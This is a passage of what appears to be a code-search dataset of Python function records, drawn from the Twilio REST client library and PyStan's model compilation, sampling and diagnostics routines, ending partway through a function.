def assistant_fallback_actions(self): """ Access the assistant_fallback_actions :returns: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsList :rtype: twilio.rest.preview.understand.assistant.assistant_fallback_actions.AssistantFallbackActionsList """ if self._assistant_fallback_actions is None: self._assistant_fallback_actions = AssistantFallbackActionsList( self._version, assistant_sid=self._solution['sid'], ) return self._assistant_fallback_actions
python
{ "resource": "" }
q29641
AssistantContext.assistant_initiation_actions
train
def assistant_initiation_actions(self): """ Access the assistant_initiation_actions :returns: twilio.rest.preview.understand.assistant.assistant_initiation_actions.AssistantInitiationActionsList :rtype: twilio.rest.preview.understand.assistant.assistant_initiation_actions.AssistantInitiationActionsList """ if self._assistant_initiation_actions is None: self._assistant_initiation_actions = AssistantInitiationActionsList( self._version, assistant_sid=self._solution['sid'], ) return self._assistant_initiation_actions
python
{ "resource": "" }
q29642
AllTimePage.get_instance
train
def get_instance(self, payload): """ Build an instance of AllTimeInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.usage.record.all_time.AllTimeInstance :rtype: twilio.rest.api.v2010.account.usage.record.all_time.AllTimeInstance """ return AllTimeInstance(self._version, payload, account_sid=self._solution['account_sid'], )
python
{ "resource": "" }
q29643
NotificationList.create
train
def create(self, body=values.unset, priority=values.unset, ttl=values.unset,
           title=values.unset, sound=values.unset, action=values.unset,
           data=values.unset, apn=values.unset, gcm=values.unset,
           sms=values.unset, facebook_messenger=values.unset,
           fcm=values.unset, segment=values.unset, alexa=values.unset,
           to_binding=values.unset, identity=values.unset, tag=values.unset):
    """
    Create a new NotificationInstance.

    :param unicode body: The notification body text
    :param NotificationInstance.Priority priority: The priority of the notification
    :param unicode ttl: How long, in seconds, the notification is valid
    :param unicode title: The notification title
    :param unicode sound: The name of the sound to be played for the notification
    :param unicode action: The actions to display for the notification
    :param dict data: The custom key-value pairs of the notification's payload
    :param dict apn: The APNS-specific payload that overrides corresponding attributes in a generic payload for APNS Bindings
    :param dict gcm: The GCM-specific payload that overrides corresponding attributes in generic payload for GCM Bindings
    :param dict sms: The SMS-specific payload that overrides corresponding attributes in generic payload for SMS Bindings
    :param dict facebook_messenger: Deprecated
    :param dict fcm: The FCM-specific payload that overrides corresponding attributes in generic payload for FCM Bindings
    :param unicode segment: A Segment to notify
    :param dict alexa: Deprecated
    :param unicode to_binding: The destination address specified as a JSON string
    :param unicode identity: The `identity` value that identifies the new resource's User
    :param unicode tag: A tag that selects the Bindings to notify

    :returns: Newly created NotificationInstance
    :rtype: twilio.rest.notify.v1.service.notification.NotificationInstance
    """
    # List-valued fields go through serialize.map, dict-valued fields
    # through serialize.object; unset entries are dropped by values.of().
    # Local renamed to form_data so it does not shadow the `data` parameter.
    form_data = values.of({
        'Identity': serialize.map(identity, lambda e: e),
        'Tag': serialize.map(tag, lambda e: e),
        'Body': body,
        'Priority': priority,
        'Ttl': ttl,
        'Title': title,
        'Sound': sound,
        'Action': action,
        'Data': serialize.object(data),
        'Apn': serialize.object(apn),
        'Gcm': serialize.object(gcm),
        'Sms': serialize.object(sms),
        'FacebookMessenger': serialize.object(facebook_messenger),
        'Fcm': serialize.object(fcm),
        'Segment': serialize.map(segment, lambda e: e),
        'Alexa': serialize.object(alexa),
        'ToBinding': serialize.map(to_binding, lambda e: e),
    })

    payload = self._version.create('POST', self._uri, data=form_data)

    return NotificationInstance(
        self._version,
        payload,
        service_sid=self._solution['service_sid'],
    )
python
{ "resource": "" }
q29644
DataSessionList.stream
train
def stream(self, end=values.unset, start=values.unset, limit=None, page_size=None): """ Streams DataSessionInstance records from the API as a generator stream. This operation lazily loads records as efficiently as possible until the limit is reached. The results are returned as a generator, so this operation is memory efficient. :param datetime end: The end :param datetime start: The start :param int limit: Upper limit for the number of records to return. stream() guarantees to never return more than limit. Default is no limit :param int page_size: Number of records to fetch per request, when not set will use the default value of 50 records. If no page_size is defined but a limit is defined, stream() will attempt to read the limit with the most efficient page size, i.e. min(limit, 1000) :returns: Generator that will yield up to limit results :rtype: list[twilio.rest.wireless.v1.sim.data_session.DataSessionInstance] """ limits = self._version.read_limits(limit, page_size) page = self.page(end=end, start=start, page_size=limits['page_size'], ) return self._version.stream(page, limits['limit'], limits['page_limit'])
python
{ "resource": "" }
q29645
DataSessionList.page
train
def page(self, end=values.unset, start=values.unset, page_token=values.unset, page_number=values.unset, page_size=values.unset): """ Retrieve a single page of DataSessionInstance records from the API. Request is executed immediately :param datetime end: The end :param datetime start: The start :param str page_token: PageToken provided by the API :param int page_number: Page Number, this value is simply for client state :param int page_size: Number of records to return, defaults to 50 :returns: Page of DataSessionInstance :rtype: twilio.rest.wireless.v1.sim.data_session.DataSessionPage """ params = values.of({ 'End': serialize.iso8601_datetime(end), 'Start': serialize.iso8601_datetime(start), 'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, }) response = self._version.page( 'GET', self._uri, params=params, ) return DataSessionPage(self._version, response, self._solution)
python
{ "resource": "" }
q29646
DataSessionPage.get_instance
train
def get_instance(self, payload): """ Build an instance of DataSessionInstance :param dict payload: Payload response from the API :returns: twilio.rest.wireless.v1.sim.data_session.DataSessionInstance :rtype: twilio.rest.wireless.v1.sim.data_session.DataSessionInstance """ return DataSessionInstance(self._version, payload, sim_sid=self._solution['sim_sid'], )
python
{ "resource": "" }
q29647
AddOnResultList.get
train
def get(self, sid): """ Constructs a AddOnResultContext :param sid: The unique string that identifies the resource to fetch :returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext :rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext """ return AddOnResultContext( self._version, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], sid=sid, )
python
{ "resource": "" }
q29648
AddOnResultPage.get_instance
train
def get_instance(self, payload): """ Build an instance of AddOnResultInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance :rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance """ return AddOnResultInstance( self._version, payload, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], )
python
{ "resource": "" }
q29649
AddOnResultContext.fetch
train
def fetch(self): """ Fetch a AddOnResultInstance :returns: Fetched AddOnResultInstance :rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return AddOnResultInstance( self._version, payload, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], sid=self._solution['sid'], )
python
{ "resource": "" }
q29650
AddOnResultContext.payloads
train
def payloads(self): """ Access the payloads :returns: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList :rtype: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList """ if self._payloads is None: self._payloads = PayloadList( self._version, account_sid=self._solution['account_sid'], reference_sid=self._solution['reference_sid'], add_on_result_sid=self._solution['sid'], ) return self._payloads
python
{ "resource": "" }
q29651
MonthlyPage.get_instance
train
def get_instance(self, payload): """ Build an instance of MonthlyInstance :param dict payload: Payload response from the API :returns: twilio.rest.api.v2010.account.usage.record.monthly.MonthlyInstance :rtype: twilio.rest.api.v2010.account.usage.record.monthly.MonthlyInstance """ return MonthlyInstance(self._version, payload, account_sid=self._solution['account_sid'], )
python
{ "resource": "" }
q29652
AvailableAddOnExtensionList.get
train
def get(self, sid): """ Constructs a AvailableAddOnExtensionContext :param sid: The unique Extension Sid :returns: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionContext :rtype: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionContext """ return AvailableAddOnExtensionContext( self._version, available_add_on_sid=self._solution['available_add_on_sid'], sid=sid, )
python
{ "resource": "" }
q29653
AvailableAddOnExtensionPage.get_instance
train
def get_instance(self, payload): """ Build an instance of AvailableAddOnExtensionInstance :param dict payload: Payload response from the API :returns: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionInstance :rtype: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionInstance """ return AvailableAddOnExtensionInstance( self._version, payload, available_add_on_sid=self._solution['available_add_on_sid'], )
python
{ "resource": "" }
q29654
AvailableAddOnExtensionContext.fetch
train
def fetch(self): """ Fetch a AvailableAddOnExtensionInstance :returns: Fetched AvailableAddOnExtensionInstance :rtype: twilio.rest.preview.marketplace.available_add_on.available_add_on_extension.AvailableAddOnExtensionInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return AvailableAddOnExtensionInstance( self._version, payload, available_add_on_sid=self._solution['available_add_on_sid'], sid=self._solution['sid'], )
python
{ "resource": "" }
q29655
EntityList.create
train
def create(self, identity): """ Create a new EntityInstance :param unicode identity: Unique identity of the Entity :returns: Newly created EntityInstance :rtype: twilio.rest.authy.v1.service.entity.EntityInstance """ data = values.of({'Identity': identity, }) payload = self._version.create( 'POST', self._uri, data=data, ) return EntityInstance(self._version, payload, service_sid=self._solution['service_sid'], )
python
{ "resource": "" }
q29656
EntityList.get
train
def get(self, identity): """ Constructs a EntityContext :param identity: Unique identity of the Entity :returns: twilio.rest.authy.v1.service.entity.EntityContext :rtype: twilio.rest.authy.v1.service.entity.EntityContext """ return EntityContext(self._version, service_sid=self._solution['service_sid'], identity=identity, )
python
{ "resource": "" }
q29657
EntityPage.get_instance
train
def get_instance(self, payload): """ Build an instance of EntityInstance :param dict payload: Payload response from the API :returns: twilio.rest.authy.v1.service.entity.EntityInstance :rtype: twilio.rest.authy.v1.service.entity.EntityInstance """ return EntityInstance(self._version, payload, service_sid=self._solution['service_sid'], )
python
{ "resource": "" }
q29658
EntityContext.fetch
train
def fetch(self): """ Fetch a EntityInstance :returns: Fetched EntityInstance :rtype: twilio.rest.authy.v1.service.entity.EntityInstance """ params = values.of({}) payload = self._version.fetch( 'GET', self._uri, params=params, ) return EntityInstance( self._version, payload, service_sid=self._solution['service_sid'], identity=self._solution['identity'], )
python
{ "resource": "" }
q29659
EntityContext.factors
train
def factors(self): """ Access the factors :returns: twilio.rest.authy.v1.service.entity.factor.FactorList :rtype: twilio.rest.authy.v1.service.entity.factor.FactorList """ if self._factors is None: self._factors = FactorList( self._version, service_sid=self._solution['service_sid'], identity=self._solution['identity'], ) return self._factors
python
{ "resource": "" }
q29660
stanc
train
def stanc(file=None, charset='utf-8', model_code=None, model_name="anon_model",
          include_paths=None, verbose=False, obfuscate_model_name=True):
    """Translate Stan model specification into C++ code.

    Parameters
    ----------
    file : {string, file}, optional
        If filename, the string passed as an argument is expected to
        be a filename containing the Stan model specification.

        If file, the object passed must have a 'read' method (file-like
        object) that is called to fetch the Stan model specification.

    charset : string, 'utf-8' by default
        If bytes or files are provided, this charset is used to decode.

    model_code : string, optional
        A string containing the Stan model specification. Alternatively,
        the model may be provided with the parameter `file`.

    model_name: string, 'anon_model' by default
        A string naming the model. If none is provided 'anon_model' is
        the default.

    include_paths: list of strings, optional
        Paths for #include files defined in Stan code.

    verbose : boolean, False by default
        Indicates whether intermediate output should be piped to the console.
        Kept for interface compatibility; not used by this function.

    obfuscate_model_name : boolean, True by default
        If False the model name in the generated C++ code will not be made
        unique by the insertion of randomly generated characters.
        Generally it is recommended that this parameter be left as True.

    Returns
    -------
    stanc_ret : dict
        A dictionary with the following keys: model_name, model_code,
        cppcode, include_paths, and status. Status indicates the success of
        the translation from Stan code into C++ code.

    Raises
    ------
    ValueError
        If both or neither of `file` and `model_code` are given, or if the
        Stan code fails to parse.

    Notes
    -----
    C++ reserved words and Stan reserved words may not be used for variable
    names; see the Stan User's Guide for a complete list.

    The `#include` method follows a C/C++ syntax `#include foo/my_gp_funs.stan`.
    The method needs to be at the start of the row, no whitespace is allowed.
    After the included file no whitespace or comments are allowed.

    See also
    --------
    StanModel : Class representing a compiled Stan model
    stan : Fit a model using Stan

    References
    ----------
    The Stan Development Team (2013) *Stan Modeling Language User's Guide
    and Reference Manual*.  <http://mc-stan.org/>.
    """
    # Exactly one of `file` / `model_code` must be supplied.
    if file and model_code:
        raise ValueError("Specify stan model with `file` or `model_code`, "
                         "not both.")
    if file is None and model_code is None:
        raise ValueError("Model file missing and empty model_code.")
    if file is not None:
        if isinstance(file, string_types):
            try:
                with io.open(file, 'rt', encoding=charset) as f:
                    model_code = f.read()
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are not intercepted; the original error is still re-raised.
            except Exception:
                logger.critical("Unable to read file specified by `file`.")
                raise
        else:
            model_code = file.read()
            # Files opened in binary mode yield bytes; decode with the
            # documented `charset` so the later .encode('utf-8') succeeds.
            if isinstance(model_code, bytes):
                model_code = model_code.decode(charset)

    # bytes, going into C++ code
    model_code_bytes = model_code.encode('utf-8')

    if include_paths is None:
        include_paths = [os.path.abspath('.')]
    elif isinstance(include_paths, string_types):
        include_paths = [include_paths]
    # add trailing / so the C++ side can concatenate path + filename directly
    include_paths = [os.path.join(path, "") for path in include_paths]
    include_paths_bytes = [path.encode('utf-8') for path in include_paths]

    # set to False: user-defined externals are not allowed here
    allow_undefined = False

    if obfuscate_model_name:
        # Make the model name depend on the code so recompilation is
        # triggered whenever the model changes.
        model_name = (
            model_name + '_' + hashlib.md5(model_code_bytes).hexdigest())

    model_name_bytes = model_name.encode('ascii')

    if not isinstance(file, string_types):
        # use default 'unknown file name'
        filename_bytes = b'unknown file name'
    else:
        # use only the filename, used only for debug printing
        filename_bytes = os.path.split(file)[-1].encode('utf-8')

    result = pystan._api.stanc(model_code_bytes,
                               model_name_bytes,
                               allow_undefined,
                               filename_bytes,
                               include_paths_bytes,
                               )
    if result['status'] == -1:  # EXCEPTION_RC is -1
        msg = result['msg']
        if PY2:
            # fix problem with unicode in error message in PY2
            msg = msg.encode('ascii', 'replace')
        error_msg = "Failed to parse Stan model '{}'. Error message:\n{}".format(model_name, msg)
        raise ValueError(error_msg)
    elif result['status'] == 0:  # SUCCESS_RC is 0
        logger.debug("Successfully parsed Stan model '{}'.".format(model_name))
    del result['msg']
    result.update({'model_name': model_name})
    result.update({'model_code': model_code})
    result.update({'include_paths': include_paths})
    return result
python
{ "resource": "" }
q29661
stan
train
def stan(file=None, model_name="anon_model", model_code=None, fit=None,
         data=None, pars=None, chains=4, iter=2000, warmup=None, thin=1,
         init="random", seed=None, algorithm=None, control=None,
         sample_file=None, diagnostic_file=None, verbose=False,
         boost_lib=None, eigen_lib=None, include_paths=None, n_jobs=-1,
         **kwargs):
    """Fit a model using Stan.

    The `pystan.stan` function was deprecated in version 2.17 and will be
    removed in version 3.0. Compiling and using a Stan Program (e.g., for
    drawing samples) should be done in separate steps.

    Parameters
    ----------
    file : string {'filename', file-like object}
        Model code must found via one of the following parameters: `file` or
        `model_code`.

        If `file` is a filename, the string passed as an argument is expected
        to be a filename containing the Stan model specification.

        If `file` is a file object, the object passed must have a 'read'
        method (file-like object) that is called to fetch the Stan model
        specification.
    charset : string, optional
        If bytes or files are provided, this charset is used to decode.
        'utf-8' by default.  NOTE(review): `charset` is not in this
        function's signature -- presumably consumed by `StanModel`; confirm.
    model_code : string
        A string containing the Stan model specification. Alternatively, the
        model may be provided with the parameter `file`.
    model_name : string, optional
        A string naming the model. If none is provided 'anon_model' is the
        default. However, if `file` is a filename, then the filename will be
        used to provide a name. 'anon_model' by default.
    fit : StanFit instance
        An instance of StanFit derived from a previous fit, None by default.
        If `fit` is not None, the compiled model associated with a previous
        fit is reused and recompilation is avoided.
    data : dict
        A Python dictionary providing the data for the model. Variables for
        Stan are stored in the dictionary as expected. Variable names are
        the keys and the values are their associated values. Stan only
        accepts certain kinds of values; see Notes.
    pars : list of string, optional
        A list of strings indicating parameters of interest. By default all
        parameters specified in the model will be stored.
    chains : int, optional
        Positive integer specifying number of chains. 4 by default.
    iter : int, 2000 by default
        Positive integer specifying how many iterations for each chain
        including warmup.
    warmup : int, iter//2 by default
        Positive integer specifying number of warmup (aka burn-in)
        iterations. As `warmup` also specifies the number of iterations used
        for stepsize adaption, warmup samples should not be used for
        inference.
    thin : int, optional
        Positive integer specifying the period for saving samples.
        Default is 1.
    init : {0, '0', 'random', function returning dict, list of dict}, optional
        Specifies how initial parameter values are chosen:

        - 0 or '0' initializes all to be zero on the unconstrained support.
        - 'random' generates random initial values. An optional parameter
          `init_r` controls the range of randomly generated initial values
          for parameters in terms of their unconstrained support;
        - list of size equal to the number of chains (`chains`), where the
          list contains a dict with initial parameter values;
        - function returning a dict with initial parameter values. The
          function may take an optional argument `chain_id`.
    seed : int or np.random.RandomState, optional
        The seed, a positive integer for random number generation. Only one
        seed is needed when multiple chains are used, as the other chain's
        seeds are generated from the first chain's to prevent dependency
        among random number streams. By default, seed is
        ``random.randint(0, MAX_UINT)``.
    algorithm : {"NUTS", "HMC", "Fixed_param"}, optional
        One of the algorithms that are implemented in Stan such as the
        No-U-Turn sampler (NUTS, Hoffman and Gelman 2011) and static HMC.
    sample_file : string, optional
        File name specifying where samples for *all* parameters and other
        saved quantities will be written. If not provided, no samples will
        be written. If the folder given is not writable, a temporary
        directory will be used. When there are multiple chains, an
        underscore and chain number are appended to the file name. By
        default do not write samples to file.
    diagnostic_file : string, optional
        File name specifying where diagnostic information should be written.
        By default no diagnostic information is recorded.
    boost_lib : string, optional
        The path to a version of the Boost C++ library to use instead of
        the one supplied with PyStan.
    eigen_lib : string, optional
        The path to a version of the Eigen C++ library to use instead of
        the one in the supplied with PyStan.
    include_paths : list of strings, optional
        Paths for #include files defined in Stan code.
    verbose : boolean, optional
        Indicates whether intermediate output should be piped to the
        console. This output may be useful for debugging. False by default.
    control : dict, optional
        A dictionary of parameters to control the sampler's behavior.
        Default values are used if control is not specified. The following
        are adaptation parameters for sampling algorithms. These are
        parameters used in Stan with similar names:

        - `adapt_engaged` : bool
        - `adapt_gamma` : float, positive, default 0.05
        - `adapt_delta` : float, between 0 and 1, default 0.8
        - `adapt_kappa` : float, between default 0.75
        - `adapt_t0` : float, positive, default 10
        - `adapt_init_buffer` : int, positive, defaults to 75
        - `adapt_term_buffer` : int, positive, defaults to 50
        - `adapt_window` : int, positive, defaults to 25

        In addition, the algorithm HMC (called 'static HMC' in Stan) and
        NUTS share the following parameters:

        - `stepsize`: float, positive
        - `stepsize_jitter`: float, between 0 and 1
        - `metric` : str, {"unit_e", "diag_e", "dense_e"}

        In addition, depending on which algorithm is used, different
        parameters can be set as in Stan for sampling. For the algorithm
        HMC we can set

        - `int_time`: float, positive

        For algorithm NUTS, we can set

        - `max_treedepth` : int, positive
    n_jobs : int, optional
        Sample in parallel. If -1 all CPUs are used. If 1, no parallel
        computing code is used at all, which is useful for debugging.

    Returns
    -------
    fit : StanFit instance

    Other parameters
    ----------------
    chain_id : int, optional
        `chain_id` can be a vector to specify the chain_id for all chains
        or an integer. For the former case, they should be unique. For the
        latter, the sequence of integers starting from the given `chain_id`
        are used for all chains.
    init_r : float, optional
        `init_r` is only valid if `init` == "random". In this case, the
        initial values are simulated from [-`init_r`, `init_r`] rather than
        using the default interval (see the manual of (Cmd)Stan).
    test_grad : bool, optional
        If `test_grad` is ``True``, Stan will not do any sampling. Instead,
        the gradient calculation is tested and printed out and the fitted
        StanFit4Model object is in test gradient mode. By default, it is
        ``False``.
    append_samples : bool, optional
    refresh : int, optional
        Argument `refresh` can be used to control how to indicate the
        progress during sampling (i.e. show the progress every `refresh`
        iterations). By default, `refresh` is `max(iter/10, 1)`.
    obfuscate_model_name : boolean, optional
        `obfuscate_model_name` is only valid if `fit` is None. True by
        default. If False the model name in the generated C++ code will not
        be made unique by the insertion of randomly generated characters.
        Generally it is recommended that this parameter be left as True.

    Examples
    --------
    >>> from pystan import stan
    >>> import numpy as np
    >>> model_code = '''
    ... parameters {
    ...     real y[2];
    ... }
    ... model {
    ...     y[1] ~ normal(0, 1);
    ...     y[2] ~ double_exponential(0, 2);
    ... }'''
    >>> fit1 = stan(model_code=model_code, iter=10)
    >>> print(fit1)
    >>> excode = '''
    ... transformed data {
    ...     real y[20];
    ...     y[1] = 0.5796;  y[2]  = 0.2276;  y[3]  = -0.2959;
    ...     y[4] = -0.3742; y[5]  = 0.3885;  y[6]  = -2.1585;
    ...     y[7] = 0.7111;  y[8]  = 1.4424;  y[9]  = 2.5430;
    ...     y[10] = 0.3746; y[11] = 0.4773;  y[12] = 0.1803;
    ...     y[13] = 0.5215; y[14] = -1.6044; y[15] = -0.6703;
    ...     y[16] = 0.9459; y[17] = -0.382;  y[18] = 0.7619;
    ...     y[19] = 0.1006; y[20] = -1.7461;
    ... }
    ... parameters {
    ...     real mu;
    ...     real<lower=0, upper=10> sigma;
    ...     vector[2] z[3];
    ...     real<lower=0> alpha;
    ... }
    ... model {
    ...     y ~ normal(mu, sigma);
    ...     for (i in 1:3)
    ...         z[i] ~ normal(0, 1);
    ...     alpha ~ exponential(2);
    ... }'''
    >>>
    >>> def initfun1():
    ...     return dict(mu=1, sigma=4, z=np.random.normal(size=(3, 2)), alpha=1)
    >>> exfit0 = stan(model_code=excode, init=initfun1)
    >>> def initfun2(chain_id=1):
    ...     return dict(mu=1, sigma=4, z=np.random.normal(size=(3, 2)), alpha=1 + chain_id)
    >>> exfit1 = stan(model_code=excode, init=initfun2)
    """
    logger.warning('DeprecationWarning: pystan.stan was deprecated in version 2.17 and will be removed in version 3.0. '
                   'Compile and use a Stan program in separate steps.')
    # NOTE: this is a thin wrapper for other functions. Error handling occurs
    # elsewhere.
    if data is None:
        data = {}
    if warmup is None:
        warmup = int(iter // 2)
    # Pop before the kwargs validation below: this keyword is consumed here
    # (forwarded to StanModel), not passed on to `sampling`.
    obfuscate_model_name = kwargs.pop("obfuscate_model_name", True)
    if fit is not None:
        # Reuse the compiled model from a previous fit to avoid recompilation.
        m = fit.stanmodel
    else:
        m = StanModel(file=file, model_name=model_name, model_code=model_code,
                      boost_lib=boost_lib, eigen_lib=eigen_lib,
                      include_paths=include_paths,
                      obfuscate_model_name=obfuscate_model_name,
                      verbose=verbose)
    # check that arguments in kwargs are valid
    valid_args = {"chain_id", "init_r", "test_grad", "append_samples",
                  "enable_random_init", "refresh", "control"}
    for arg in kwargs:
        if arg not in valid_args:
            raise ValueError("Parameter `{}` is not recognized.".format(arg))
    fit = m.sampling(data, pars=pars, chains=chains, iter=iter, warmup=warmup,
                     thin=thin, seed=seed, init=init, sample_file=sample_file,
                     diagnostic_file=diagnostic_file, verbose=verbose,
                     algorithm=algorithm, control=control, n_jobs=n_jobs,
                     **kwargs)
    return fit
python
{ "resource": "" }
q29662
ess
train
def ess(sim, n):
    """Return the effective sample size of one flat parameter.

    Parameters
    ----------
    sim : chains
        Chain data as stored on a fit object.
    n : int
        Flat parameter index, starting from 0.

    Returns
    -------
    float
        Effective sample size, or ``nan`` when the estimate is undefined.
    """
    try:
        return _chains.effective_sample_size(sim, n)
    except (ValueError, ZeroDivisionError):
        # Degenerate chains (e.g. constant draws) make the estimate undefined.
        return nan
python
{ "resource": "" }
q29663
traceplot
train
def traceplot(fit, pars, dtypes, **kwargs):
    """Display parameter traces using pymc's traceplot.

    Additional keyword arguments are forwarded to ``pymc.plots.traceplot``.
    """
    # FIXME: eventually put this in the StanFit object
    # FIXME: write a to_pymc(_trace) function
    # Deprecation warning added in PyStan 2.18
    logger.warning("Deprecation warning."
                   " In future, use ArviZ library (`pip install arviz`)")
    try:
        from pystan.external.pymc import plots
    except ImportError:
        logger.critical("matplotlib required for plotting.")
        raise
    if pars is None:
        pars = list(fit.model_pars) + ["lp__"]
    extracted = fit.extract(dtypes=dtypes, pars=pars, permuted=False)
    # Collapse (iterations, chains, *param_dims) into 2-D column-major arrays.
    flattened = {}
    for name, draws in extracted.items():
        n_columns = int(np.multiply.reduce(draws.shape[2:]))
        flattened[name] = draws.reshape(-1, n_columns, order="F")
    return plots.traceplot(flattened, pars, **kwargs)
python
{ "resource": "" }
q29664
autocorrplot
train
def autocorrplot(trace, vars=None, fontmap=None, max_lag=100):
    """Bar plot of the autocorrelation function for a trace.

    Parameters
    ----------
    trace : MultiTrace or NpTrace
        A MultiTrace exposes ``.traces``; a single NpTrace is wrapped in a
        one-element list.
    vars : sequence of str, optional
        Variable names to plot; defaults to ``varnames`` of the first trace.
    fontmap : dict, optional
        Map from size class to tick-label font size.
    max_lag : int, optional
        Largest lag to show; clipped to (number of samples - 1).

    NOTE(review): the plotting helpers (``subplots``, ``gca``, ``setp``,
    ``mlab``) and ``xrange`` are not defined in this block -- presumably a
    pylab-style star import at module top. ``xrange`` is Python-2-only;
    confirm this module is not exercised under Python 3 as-is.
    """
    try:
        # MultiTrace
        traces = trace.traces
    except AttributeError:
        # NpTrace
        traces = [trace]

    if fontmap is None:
        fontmap = {1: 10, 2: 8, 3: 6, 4: 5, 5: 4}

    if vars is None:
        vars = traces[0].varnames

    # Extract sample data: one {varname: samples} dict per chain.
    samples = [{v: trace[v] for v in vars} for trace in traces]

    chains = len(traces)

    # Grid of axes: one row per variable, one column per chain.
    n = len(samples[0])
    f, ax = subplots(n, chains, squeeze=False)

    max_lag = min(len(samples[0][vars[0]]) - 1, max_lag)

    for i, v in enumerate(vars):
        for j in xrange(chains):
            d = np.squeeze(samples[j][v])

            ax[i, j].acorr(d, detrend=mlab.detrend_mean, maxlags=max_lag)

            if not j:
                # Only label the y-axis of the leftmost column.
                ax[i, j].set_ylabel("correlation")
            ax[i, j].set_xlabel("lag")

            if chains > 1:
                ax[i, j].set_title("chain {0}".format(j + 1))

    # Smaller tick labels
    tlabels = gca().get_xticklabels()
    setp(tlabels, 'fontsize', fontmap[1])

    tlabels = gca().get_yticklabels()
    setp(tlabels, 'fontsize', fontmap[1])
python
{ "resource": "" }
q29665
check_treedepth
train
def check_treedepth(fit, verbose=True, per_chain=False):
    """Check for transitions that ended prematurely due to maximum tree depth limit.

    Parameters
    ----------
    fit : StanFit4Model object
    verbose : bool or int, optional
        If ``verbose`` is ``False`` or a nonpositive integer, no diagnostic
        messages are printed, and only the return value of the function
        conveys diagnostic information. If it is ``True`` (the default) or
        an integer greater than zero, then a diagnostic message is printed
        only if there are transitions that ended prematurely due to the
        maximum tree depth limit. If it is an integer greater than 2, then
        extra diagnostic messages are printed.
    per_chain : bool, optional
        Print the number of prematurely ending transitions in each chain.

    Returns
    -------
    bool
        ``True`` if there are no problems with tree depth and ``False``
        otherwise.

    Raises
    ------
    ValueError
        If ``fit`` has no information about tree depth. This could happen
        if ``fit`` was generated from a sampler other than NUTS.
    """
    verbosity = int(verbose)
    sampler_params = fit.get_sampler_params(inc_warmup=False)
    # One column per chain; rows are post-warmup iterations.
    try:
        depths = np.column_stack([y['treedepth__'].astype(int) for y in sampler_params])
    except:
        raise ValueError('Cannot access tree depth information from fit object')
    try:
        max_treedepth = int(fit.stan_args[0]['ctrl']['sampling']['max_treedepth'])
    except:
        raise ValueError('Cannot obtain value of max_treedepth from fit object')
    # Saturation counts: per chain, then total over all chains.
    n_for_chains = (depths >= max_treedepth).sum(axis=0)
    n = n_for_chains.sum()
    if n > 0:
        if verbosity > 0:
            N = depths.size
            logger.warning(('{} of {} iterations saturated the maximum tree depth of {}' +
                            ' ({:.3g} %)').format(n, N, max_treedepth, 100 * n / N))
            if per_chain:
                chain_len, num_chains = depths.shape
                for chain_num in range(num_chains):
                    if n_for_chains[chain_num] > 0:
                        logger.warning('Chain {}: {} of {} saturated '.format(chain_num + 1,
                                       n_for_chains[chain_num], chain_len) +
                                       'the maximum tree depth of {} ({:.3g} %).'.format(max_treedepth,
                                       100 * n_for_chains[chain_num] / chain_len))
            logger.warning('Run again with max_treedepth larger than {}'.format(max_treedepth) +
                           ' to avoid saturation')
        return False
    else:
        if verbosity > 2:
            logger.info('No transitions that ended prematurely due to maximum tree depth limit')
        return True
python
{ "resource": "" }
q29666
check_n_eff
train
def check_n_eff(fit, pars=None, verbose=True):
    """Checks the effective sample size per iteration.

    Parameters
    ----------
    fit : StanFit4Model object
    pars : {str, sequence of str}, optional
        Parameter (or quantile) name(s). Test only specific parameters.
        Raises an exception if parameter is not valid.
    verbose : bool or int, optional
        If ``verbose`` is ``False`` or a nonpositive integer, no diagnostic
        messages are printed, and only the return value of the function
        conveys diagnostic information. If it is ``True`` (the default) or
        an integer greater than zero, then a diagnostic message is printed
        only if there are effective sample sizes that appear pathologically
        low. If it is an integer greater than 1, then parameter (quantile)
        diagnostics are printed. If integer is greater than 2 extra
        diagnostic messages are printed.

    Returns
    -------
    bool
        ``True`` if there are no problems with effective sample size and
        ``False`` otherwise.
    """
    verbosity = int(verbose)
    # Total post-warmup draws across all chains.
    n_iter = sum(fit.sim['n_save'])-sum(fit.sim['warmup2'])
    if pars is None:
        pars = fit.sim['fnames_oi']
    else:
        if isinstance(pars, string_types):
            pars = [pars]
        pars = _remove_empty_pars(pars, fit.sim['pars_oi'], fit.sim['dims_oi'])
        allpars = fit.sim['pars_oi'] + fit.sim['fnames_oi']
        _check_pars(allpars, pars)
        # "Packed" names (e.g. 'eta') must be expanded into their flat
        # element names (e.g. 'eta[1]', 'eta[2]', ...).
        packed_pars = set(pars) - set(fit.sim['fnames_oi'])
        if packed_pars:
            unpack_dict = {}
            for par_unpacked in fit.sim['fnames_oi']:
                par_packed = par_unpacked.split("[")[0]
                if par_packed not in unpack_dict:
                    unpack_dict[par_packed] = []
                unpack_dict[par_packed].append(par_unpacked)
            pars_unpacked = []
            for par in pars:
                if par in packed_pars:
                    pars_unpacked.extend(unpack_dict[par])
                else:
                    pars_unpacked.append(par)
            pars = pars_unpacked
    # Map each flat parameter name to its column index.
    par_n_dict = {}
    for n, par in enumerate(fit.sim['fnames_oi']):
        par_n_dict[par] = n
    no_warning = True
    for name in pars:
        n = par_n_dict[name]
        n_eff = pystan.chains.ess(fit.sim, n)
